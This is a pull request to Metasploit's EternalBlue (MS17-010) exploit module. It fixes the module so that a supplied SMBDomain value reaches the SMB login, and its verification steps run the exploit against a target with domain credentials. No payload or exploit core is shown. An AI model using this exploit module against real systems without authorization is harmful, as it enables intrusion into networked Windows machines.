### PR TITLE
ms17_010_eternalblue: use SMBDomain value when provided instead of ignoring it

### DIFF
--- a/modules/exploits/windows/smb/ms17_010_eternalblue.rb
+++ b/modules/exploits/windows/smb/ms17_010_eternalblue.rb
@@ -322,7 +322,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def smb1_anonymous_connect_ipc
     sock = connect(false)
     dispatcher = RubySMB::Dispatcher::Socket.new(sock)
-    client = RubySMB::Client.new(dispatcher, smb1: true, smb2: false, username: smb_user, password: smb_pass)
+    client = RubySMB::Client.new(dispatcher, smb1: true, smb2: false, username: smb_user, domain: smb_domain, password: smb_pass)
     response_code = client.login
 
     unless response_code == ::WindowsError::NTStatus::STATUS_SUCCESS
@@ -365,7 +365,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def smb1_free_hole(start)
     sock = connect(false)
     dispatcher = RubySMB::Dispatcher::Socket.new(sock)
-    client = RubySMB::Client.new(dispatcher, smb1: true, smb2: false, username: smb_user, password: smb_pass)
+    client = RubySMB::Client.new(dispatcher, smb1: true, smb2: false, username: smb_user, domain: smb_domain, password: smb_pass)
     client.negotiate
 
     pkt = ""
@@ -692,6 +692,20 @@ class MetasploitModule < Msf::Exploit::Remote
   def smb_user
     if datastore['SMBUser'].present?
       datastore['SMBUser']
+    else
+      ''
+    end
+  end
+
+  # Returns the value to be passed to SMB clients for
+  # the domain. If the user has not supplied a domain
+  # it returns an empty string to trigger an anonymous
+  # logon.
+  #
+  # @return [String] the domain value
+  def smb_domain
+    if datastore['SMBDomain'].present?
+      datastore['SMBDomain']
     else
       ''
     end


### PR DESCRIPTION
This fixes the fact that the SMBDomain option value is currently ignored.

This happens when the MSF user provides SMBUser, SMBPass and SMBDomain for a domain user (when running against a domain-joined computer). Since the SMBDomain is ingored, then it generates an authentication request for ".\user" being the local user, instead of the domain one. It fails in most cases (except if there is a local user with the same password of course).

## Verification

- [ ] Start `msfconsole`
- [ ] `use exploits/windows/smb/ms17_010_eternalblue`
- [ ] `set SMBUser MyUser`
- [ ] `set SMBPass MyPassword`
- [ ] `set SMBDomain MyDomain`
- [ ] `set RHOST <target>`
- [ ] `run`
- [ ] **Verify** with Wireshark that the NTLMSSP_AUTH packet contains specifies the "MyDomain\MyUser" instead of ".\MyUser"

